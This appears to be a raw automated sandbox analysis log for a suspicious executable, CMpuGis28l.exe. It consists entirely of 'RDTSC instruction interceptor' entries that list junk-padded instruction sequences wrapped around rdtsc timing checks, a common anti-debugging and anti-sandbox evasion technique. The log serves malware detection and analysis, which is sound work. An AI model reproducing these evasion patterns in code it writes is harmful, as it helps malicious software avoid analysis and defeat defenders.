Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18CEB86 second address: 18CEB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D318C second address: 18D31B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A7h 0x00000007 jno 00007F9334DAF996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jng 00007F9334DAF996h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D31B7 second address: 18D31CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0032h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D31CD second address: 18D31E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D238C second address: 18D2391 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2391 second address: 18D2397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2669 second address: 18D2692 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pushad 0x00000008 jmp 00007F9334BA0033h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2BCA second address: 18D2BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2D56 second address: 18D2D71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F9334BA0026h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EBD second address: 18D2EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EC2 second address: 18D2ED8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F9334BA0031h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2ED8 second address: 18D2EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D2EE6 second address: 18D2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C11 second address: 18D7C1C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C1C second address: 18D7C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9334BA0026h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007F9334BA0039h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18D7C46 second address: 18D7C62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F9334DAF9A0h 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E19BC second address: 18E19D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9334BA0026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F9334BA0034h 0x00000010 jo 00007F9334BA002Eh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1832152 second address: 183216C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9334DAF9A5h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 183216C second address: 1832172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFC74 second address: 18DFCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F9334DAF9A7h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 jnl 00007F9334DAF99Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFFAC second address: 18DFFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DFFB0 second address: 18DFFD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9334DAF9A3h 0x0000000d pop edi 0x0000000e push ebx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E0299 second address: 18E02B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E02B1 second address: 18E02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E0575 second address: 18E057B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E057B second address: 18E05B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A6h 0x00000009 popad 0x0000000a jc 00007F9334DAF99Ah 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push esi 0x00000016 pushad 0x00000017 jmp 00007F9334DAF99Bh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17DA second address: 18E17DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17DE second address: 18E17E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E17E2 second address: 18E1843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334BA0030h 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F9334BA0033h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F9334BA0036h 0x00000020 jmp 00007F9334BA0037h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E1843 second address: 18E1847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E1847 second address: 18E185B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18DF733 second address: 18DF73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7850 second address: 18E7854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7854 second address: 18E7858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E737A second address: 18E7380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7380 second address: 18E7388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18E7388 second address: 18E73A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334BA002Ch 0x00000009 jl 00007F9334BA0026h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18F5895 second address: 18F589A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18F589A second address: 18F58A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FB963 second address: 18FB967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF685 second address: 18FF6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9334BA0030h 0x0000000d jne 00007F9334BA0032h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6AF second address: 18FF6B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6B9 second address: 18FF6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 18FF6BD second address: 18FF6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F9334DAF996h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 182ECF3 second address: 182ED10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Eh 0x00000009 jmp 00007F9334BA002Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1907307 second address: 1907311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DEEE second address: 190DEF8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DEF8 second address: 190DF55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A6h 0x0000000b jmp 00007F9334DAF99Ch 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jmp 00007F9334DAF99Ah 0x00000018 jo 00007F9334DAF996h 0x0000001e popad 0x0000001f popad 0x00000020 push esi 0x00000021 push edx 0x00000022 jmp 00007F9334DAF9A9h 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 190DF55 second address: 190DF5F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9334BA0026h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1915691 second address: 19156AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F9334DAF996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F9334DAF99Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19156AC second address: 19156F8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9334BA0028h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jns 00007F9334BA002Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jnp 00007F9334BA002Ch 0x00000019 jne 00007F9334BA0028h 0x0000001f jmp 00007F9334BA002Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 jmp 00007F9334BA002Bh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1914085 second address: 191409D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9334DAF9A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19144E4 second address: 19144E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19147D1 second address: 19147EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9334DAF9A0h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191541A second address: 1915450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0035h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F9334BA0033h 0x0000000f push eax 0x00000010 push edx 0x00000011 jng 00007F9334BA0026h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1915450 second address: 191546D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9334DAF996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jg 00007F9334DAF9A8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9334DAF99Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191B470 second address: 191B474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 191B474 second address: 191B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19560D1 second address: 19560D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 19560D8 second address: 195610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9334DAF99Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9334DAF9A7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 195610A second address: 195611A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196900C second address: 1969012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1969012 second address: 1969019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1969019 second address: 196901E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196901E second address: 1969024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968E72 second address: 1968E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968E7B second address: 1968E7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968E7F second address: 1968EAC instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9334DAF996h 0x00000008 jng 00007F9334DAF996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9334DAF9A2h 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F9334DAF996h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968EAC second address: 1968EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968EB0 second address: 1968EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1968EB8 second address: 1968EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196BE14 second address: 196BE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196B9D5 second address: 196B9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnc 00007F9334BA0026h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196B9E7 second address: 196B9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9334DAF996h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 196B9F2 second address: 196B9FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F9334BA0026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A2FF6D second address: 1A2FF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A2FF77 second address: 1A2FF9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 jmp 00007F9334BA0034h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A2FF9B second address: 1A2FFB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 jl 00007F9334DAF99Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A302C2 second address: 1A302C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A303FC second address: 1A30402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A3054C second address: 1A3055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F9334BA0026h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A30997 second address: 1A3099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A3099B second address: 1A309AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F9334BA002Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A309AD second address: 1A309B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A309B1 second address: 1A309CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9334BA0033h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A309CA second address: 1A309D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A30C72 second address: 1A30C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A30E3A second address: 1A30E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnp 00007F9334DAF996h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 1A30E47 second address: 1A30E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jp 00007F9334BA0026h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F9334BA002Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730034 second address: 7730043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730043 second address: 773005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 773005B second address: 7730078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push edx 0x0000000b mov cx, C4EFh 0x0000000f pop ecx 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bh, 3Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exeRDTSC instruction interceptor: First address: 7730078 second address: 773007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
